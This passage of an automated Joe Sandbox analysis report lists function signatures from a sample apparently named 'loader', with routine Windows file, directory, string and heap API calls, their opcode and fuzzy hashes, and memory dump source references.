              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID: ^PpL
              • API String ID: 2279764990-914357616
              • Opcode ID: dd2f76cf68408d95da68adfac44464e4893e65346c658207e28933ac885b3c29
              • Instruction ID: 4dc3c9dbebc8292106f518e1346dbeb289bb1dcb7dceb4f1a82ecf5ce1a9dd20
              • Opcode Fuzzy Hash: dd2f76cf68408d95da68adfac44464e4893e65346c658207e28933ac885b3c29
              • Instruction Fuzzy Hash: F911E733A016719BDB25AE28FC4589A73D5AF80330B9E4220FD15EB644EB70DC91C6D2
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0012A79D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx$^PpL
              • API String ID: 2568140703-2099956040
              • Opcode ID: db9744ed33a74ecdc7be206c5edbb113805504e1ca6e83adadc03cc5603c4c5a
              • Instruction ID: 7a309e6ecf8f70fd138e1d8bd3312087d1c300084ff00e9e488c19871d2a756e
              • Opcode Fuzzy Hash: db9744ed33a74ecdc7be206c5edbb113805504e1ca6e83adadc03cc5603c4c5a
              • Instruction Fuzzy Hash: 75011372500218BBCF126FA0EC02DEE7FA6FF18720F444154FE1426160CB768971EB95
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00129D2F), ref: 0012A715
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx$^PpL
              • API String ID: 2593887523-1012716583
              • Opcode ID: beca9b56684ed52f4d197fb66c16bbe60e17549496ca50eaa7654f35f64cbde2
              • Instruction ID: f3b65b310114db30c30268f082a0407da862cc2b2acac886c4adc623edf671c9
              • Opcode Fuzzy Hash: beca9b56684ed52f4d197fb66c16bbe60e17549496ca50eaa7654f35f64cbde2
              • Instruction Fuzzy Hash: 9EF0E27164521CBBCB156F64EC06CAE7FA1FF14720F404064FC191A2A0DB729E60EB95
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc$^PpL
              • API String ID: 2773662609-3289078789
              • Opcode ID: f75f18431401dc91ef7b54b6cf5578d6355b07249b121795b9b52d4d14fb5864
              • Instruction ID: 6a63d5335950d6f0dac74f69335043a01e5f3cd43ea9bd1c5a773e41df48fcd0
              • Opcode Fuzzy Hash: f75f18431401dc91ef7b54b6cf5578d6355b07249b121795b9b52d4d14fb5864
              • Instruction Fuzzy Hash: 28E0E5B074522C6BD3246B64AC069AEBB95DF25B20F810155FC0557280DF704E50AADA
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0010CC94,00000001,?,?,?,00000000,00114ECD,?,?,?), ref: 00109F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00114ECD,?,?,?,?,?,00114972,?), ref: 00109F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0010CC94,00000001,?,?), ref: 00109FB8
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: d95d1fed820f9a2d820dccd0a302983616aad04132025102459f4c58f02afabd
              • Instruction ID: e4236aac0db78a3059f5f62896d2bf2cf89794b7f170507ad40415ecca217a56
              • Opcode Fuzzy Hash: d95d1fed820f9a2d820dccd0a302983616aad04132025102459f4c58f02afabd
              • Instruction Fuzzy Hash: ED3104712083069BDF148F14D95876BBFA8EF50710F044618F9D5EA1D2C7F5D848CBA2
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A261
              • GetLastError.KERNEL32(?,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A27E
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 80441795661628d3d76a7b5e401a1b59b4829f7d9512ef50741ae55cf0fe22b6
              • Instruction ID: c5b9783571c362672fbe27819e4f77ff0987b9be77f8a62598f541c4fa7737c4
              • Opcode Fuzzy Hash: 80441795661628d3d76a7b5e401a1b59b4829f7d9512ef50741ae55cf0fe22b6
              • Instruction Fuzzy Hash: 5D01B13154031866DB36ABB44C46BEE7758BF1A781F844471F8C1D60D1DBE6CA81C6B7
              APIs
              • try_get_function.LIBVCRUNTIME ref: 001232AF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: defcaa76313b27838447223637942bd895174e057073fb298f6957ddab61e320
              • Instruction ID: 75ecb4e45ddadaaa87a4385a38301e31ae1350a6be6d6ee1fafa42c4a9e2f3f3
              • Opcode Fuzzy Hash: defcaa76313b27838447223637942bd895174e057073fb298f6957ddab61e320
              • Instruction Fuzzy Hash: CDD02BE17806346BC21032C07C03AAE7E858701FB1F450162FE081A1428765456002C9
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011E20B
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3Ro
              • API String ID: 1269201914-1492261280
              • Opcode ID: 2334ca094554957c8b5e237d02f8e3654ad05fd74bdfb2d5e6ebe12fe7ec2013
              • Instruction ID: 68850adf19af924451f7b666e80065d7ad2847e2d190ecc6de6e7b1cca6ded83
              • Opcode Fuzzy Hash: 2334ca094554957c8b5e237d02f8e3654ad05fd74bdfb2d5e6ebe12fe7ec2013
              • Instruction Fuzzy Hash: E6B012A226E0037CB20C11447E16CB7031CC4C0B50330803AF605E4080E7514D874032
              APIs
              • __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00106057: __EH_prolog.LIBCMT ref: 0010605C
                • Part of subcall function 0010C827: __EH_prolog.LIBCMT ref: 0010C82C
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C86F
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C893
              • new.LIBCMT ref: 001013FE
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: aecaf0e462d589a5318f3c520cef2b90e2c71e4fc30c63dc0051f1bf17b69f95
              • Instruction ID: 207aa58d2485b2d1901c41d098bea1bf549aaa42682c55fb50aac2ecff964d1e
              • Opcode Fuzzy Hash: aecaf0e462d589a5318f3c520cef2b90e2c71e4fc30c63dc0051f1bf17b69f95
              • Instruction Fuzzy Hash: 214127B0905B409ED724DF7984859E7FBE5FF28300F504A2ED5EE83282DB726554CB15
              APIs
              • __EH_prolog.LIBCMT ref: 00101385
                • Part of subcall function 00106057: __EH_prolog.LIBCMT ref: 0010605C
                • Part of subcall function 0010C827: __EH_prolog.LIBCMT ref: 0010C82C
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C86F
                • Part of subcall function 0010C827: new.LIBCMT ref: 0010C893
              • new.LIBCMT ref: 001013FE
                • Part of subcall function 0010B07D: __EH_prolog.LIBCMT ref: 0010B082
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 1b943ab2de38a914703a982649e91a50217458656b479a36504422a26e8ef88a
              • Instruction ID: 295976396f0be93d1aa82a57ea8d8fc6b06d1f83a5a06ae885cd0ba9b6c1b915
              • Opcode Fuzzy Hash: 1b943ab2de38a914703a982649e91a50217458656b479a36504422a26e8ef88a
              • Instruction Fuzzy Hash: 604134B0905B409EE724DF7988859E7FBE5FF28300F504A2EE5EE83282DB726554CB15
              APIs
                • Part of subcall function 00128FA5: GetLastError.KERNEL32(?,00140EE8,00123E14,00140EE8,?,?,00123713,00000050,?,00140EE8,00000200), ref: 00128FA9
                • Part of subcall function 00128FA5: _free.LIBCMT ref: 00128FDC
                • Part of subcall function 00128FA5: SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 0012901D
                • Part of subcall function 00128FA5: _abort.LIBCMT ref: 00129023
                • Part of subcall function 0012B2AE: _abort.LIBCMT ref: 0012B2E0
                • Part of subcall function 0012B2AE: _free.LIBCMT ref: 0012B314
                • Part of subcall function 0012AF1B: GetOEMCP.KERNEL32(00000000,?,?,0012B1A5,?), ref: 0012AF46
              • _free.LIBCMT ref: 0012B200
              • _free.LIBCMT ref: 0012B236
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: dc732ab99ee6779179c828bb7afce7bd1332f6f81efc16b180a08138f9653a4e
              • Instruction ID: 31ede24e13ff62b198f6fa2950f37ea8decad1de21f355f62c594be1b488a3ab
              • Opcode Fuzzy Hash: dc732ab99ee6779179c828bb7afce7bd1332f6f81efc16b180a08138f9653a4e
              • Instruction Fuzzy Hash: AF31EA31908324EFDB10EF99F481B5DB7F5EF55320F254099E4149B291EB715D61CB50
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00109EDC,?,?,00107867), ref: 001097A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00109EDC,?,?,00107867), ref: 001097DB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 5673483c5de6a24c76bdd17fd5401a3412d75b2ed9351751d0138ac68f198e8f
              • Instruction ID: 1529a5f3d04c0efe9ec4092a51b399f05accf88613d46b476433ede922fd4e1c
              • Opcode Fuzzy Hash: 5673483c5de6a24c76bdd17fd5401a3412d75b2ed9351751d0138ac68f198e8f
              • Instruction Fuzzy Hash: CA2105B2114748AFE7348F64CC85BA7B7E8EB49764F00492DF5E5821D2C7B4AC898F61
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00107547,?,?,?,?), ref: 00109D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00109E2C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 1cd59bc52634bc052e4f1e70635c6d3e978d5e863b3b795e37a74d4c6924cd17
              • Instruction ID: dda31438881a75ec037dae13b6eb44cac034a6e2489dbf124a7d96725e7cf26e
              • Opcode Fuzzy Hash: 1cd59bc52634bc052e4f1e70635c6d3e978d5e863b3b795e37a74d4c6924cd17
              • Instruction Fuzzy Hash: BC21E731188246ABC715DF64C461EABBBE4AF95708F04081DF4D1C7582D369DE4CDB51
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00109B35,?,?,00000000,?,?,00108D9C,?), ref: 00109BC0
              • GetLastError.KERNEL32 ref: 00109BCD
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 62823fbd27fe1508b22ae3ef8a2507fb1002e5730efc7b693db196214d7a0e03
              • Instruction ID: a58b20677e319f8528ef648d810f33e2c8aeb3438941fafcabcbc260a8cd3ac6
              • Opcode Fuzzy Hash: 62823fbd27fe1508b22ae3ef8a2507fb1002e5730efc7b693db196214d7a0e03
              • Instruction Fuzzy Hash: 7A0104313052059BCB08DE25ACA4C7EB399AFC0332B14852DF8A2836C2DBB4D8059A21
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00109E76
              • GetLastError.KERNEL32 ref: 00109E82
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 4bbdb63fc83997f27721d869f6109e5952f0db42d7561abc46a934fd582d9512
              • Instruction ID: bddcf41082ef4608ed9d6e97238fad9099b88ddf6abddbc753eee3f86b7568c0
              • Opcode Fuzzy Hash: 4bbdb63fc83997f27721d869f6109e5952f0db42d7561abc46a934fd582d9512
              • Instruction Fuzzy Hash: 800171717042005BEB34DE29DC54B6BB7D99B88315F14493EB196C36D1DBB5EC888610
              APIs
              • _free.LIBCMT ref: 00128627
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00140F50,0010CE57,?,?,?,?,?,?), ref: 00128663
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: ff355e8ed995c0889cd83d9de29d7d565aaf4434123d93c38bcfb9c21b00cda2
              • Instruction ID: 485789feeb82eb88dd431e10a563d05d01bc15cb170b20c55eb7aa29b06b9c33
              • Opcode Fuzzy Hash: ff355e8ed995c0889cd83d9de29d7d565aaf4434123d93c38bcfb9c21b00cda2
              • Instruction Fuzzy Hash: EFF0F032203135AACB312B26BC00F6F3B69DFE2BB0F298115F824A6591DF30C87095A4
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00110915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0011091C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 5ec0ee234daab7626197f7de197f272f3d19889ddfece86ead3ca8a8bbeba745
              • Instruction ID: 4522f8578a5d6f173555af2c8364a1007c14667d886f93a24bbb3be589db678c
              • Opcode Fuzzy Hash: 5ec0ee234daab7626197f7de197f272f3d19889ddfece86ead3ca8a8bbeba745
              • Instruction Fuzzy Hash: 1CE09232E1410DABAF0ECAB49C248FB739DEB0C2187214179B81ED7601FB70DEC186A4
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A489
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 25e2a879ad9b1da0c0d51049122f32017e500281086a7448c35e6ddf73713119
